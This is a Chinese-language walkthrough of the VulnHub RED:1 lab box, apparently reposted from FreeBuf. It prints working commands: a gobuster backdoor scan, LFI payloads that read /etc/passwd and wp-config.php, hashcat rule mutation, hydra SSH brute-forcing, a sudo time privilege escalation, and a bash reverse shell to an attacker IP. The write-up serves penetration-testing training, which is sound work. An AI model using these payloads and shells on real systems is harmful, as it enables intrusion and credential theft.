大余每日一攻防RED-1(四)
2023-12-4 14:21:36 Author: www.freebuf.com(查看原文) 阅读量:7 收藏

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:
环境攻破: 以简单直白的方式攻破每日选择的渗透测试环境。
代码审计: 进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一、网络枚举

1701670641_656d6ef160c2a869cdc22.png!small?1701670642434

1701670648_656d6ef81de86647640e5.png!small?1701670648870
nmap枚举发现ip地址:192.168.3.37

二、web信息收集

1701670651_656d6efbf3ee1892c9fac.png!small?1701670653807

发现是个Wordpress网站,但是没有正确解析,点击Hello Blue发现无法访问
1701670658_656d6f0294c49e40fe5bc.png!small?1701670659587

1701670664_656d6f0848ab61747938c.png!small?1701670664831

192.168.3.37 redrocks.win

将其添加到主机文件中:
1701670672_656d6f100ab1b7d36c5c5.png!small?1701670673268
再次访问:
1701670677_656d6f158e516db6bc135.png!small?1701670679308

三、爆破FUZZ-LFI

根据页面信息看到网站已经被入侵,并且提到有后门,看了其他的地方暂时也没发现什么,那就先看一下后门,因为WordPress 在 Apache PHP上运行。所以应该是 php 后门,用目录扫描看看能不能扫出疑似后门的文件,所以用SecLists里的CommonBackdoors-PHP.fuzz.txt扫。
下载地址:

https://github.com/danielmiessler/SecLists

命令执行:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dayu.txt -z

1701670691_656d6f23ab52111a97d53.png!small?1701670693569
发现可疑文件NetworkFileManagerPHP.php,猜测可能是webshell后门,扫描结果状态码是500,这个脚本可能存在LFI,使用wfuzz测试一下参数:

wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w 1.txt

1701670701_656d6f2d481319e45168f.png!small?1701670703039
发现key参数返回200,那就使用key参数测试一下:

http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd

1701670707_656d6f33b3231942ec74c.png!small?1701670709096
测试成功。说明有文件包含。那接下来查看一下 NetworkFileManagerPHP.php 文件:

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php

1701670716_656d6f3c6eda07bc524c7.png!small?1701670717207
通过base64编译发现:

That password alone won't help you! Hashcat says rules are rules 

仅凭那个密码对您没有帮助!让我们使用Hashcat规则!

四、base64-hashcat-hydra

提到了密码、Hashcat和规则。由于它是base64编码的,我们可以假设Red在谈论Hashcat的Best64规则为密码突变,想到的这里大概能获取wp-config文件,里面有数据库的密码:

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php

1701670737_656d6f5177361638e8a32.png!small?1701670738170
1701670743_656d6f57035594a35cc6d.png!small?1701670744001

john
R3v_m4lwh3r3_k1nG!!

用户名是john,前面查看/etc/passwd文件时发现也有john用户,那就用这个用户登录ssh,将密码保存到文件中,然后用hashcat规则破解:

hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

1701670750_656d6f5ed8c0d2b84e6c3.png!small?1701670751484

使用解出来的密码本进行ssh爆破:

hydra -l john -P passlist.txt 192.168.3.37 ssh 

ssh [email protected]
R3v_m4lwh3r3_k1nG!!00

1701670757_656d6f6549eccf2bf84a2.png!small?1701670758158

五、提权一

查看底下note_from_red.txt文件提示cat存在命令存在问题。
1701670762_656d6f6a7d2d701563319.png!small?1701670763102
发现会以ippsec用户执行/usr/bin/time:
1701670767_656d6f6f8847c0fced18c.png!small?1701670768826
提权成ippsec用户:

https://gtfobins.github.io/gtfobins/time/#sudo
sudo -u ippsec /usr/bin/time /bin/bash

1701670774_656d6f766e2c5a8bb2472.png!small?1701670775040

切换成功,查看目录发现正准备下一步时ssh连接被断开了:
1701670781_656d6f7d5c6f1562b296d.png!small?1701670781873

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.3.56/1234 0>&1'

1701670786_656d6f82ebf7926436d18.png!small?1701670788202

五、提权二

虽然Red team的信息还在弹,但是已经不会被断开连接了。下载并运行pspy64检查,看看系统在跑哪些进程。下载pspy64,赋权并运行:
1701670793_656d6f894baf5d15ffe90.png!small?1701670796098

1701670805_656d6f95199cd6fde924d.png!small?1701670805759

/var/www/wordpress/.git/supersecretfileuc.c

1701670810_656d6f9a369d3c0819b36.png!small?1701670810738
发现是定时弹出的脚本,可以上传一个C编写 shell,替代supersecretfileuc.c文件,然后等待 shell 连接,先删除/var/www/wordpress/.git/supersecretfileuc.c和rev文件:

cd /var/www/wordpress/.git/
rm -r supersecretfileuc.c

1701670815_656d6f9f6ee0335c04ade.png!small?1701670815860

写入C编写的shell替换掉原来的supersecretfileuc.c,kali上开启http服务上传:
1701670820_656d6fa4a3213bfee020a.png!small?1701670821430
1701670826_656d6faa31efd2fd7c6ae.png!small?1701670827749

最后获得root权限!
1701670831_656d6faf9989d33d1fc72.png!small?1701670832405

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!

欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

1701237386_6566d28ad323e31f56884.png!small?1701237387378


文章来源: https://www.freebuf.com/vuls/385593.html
如有侵权请联系:admin#unsafe.sh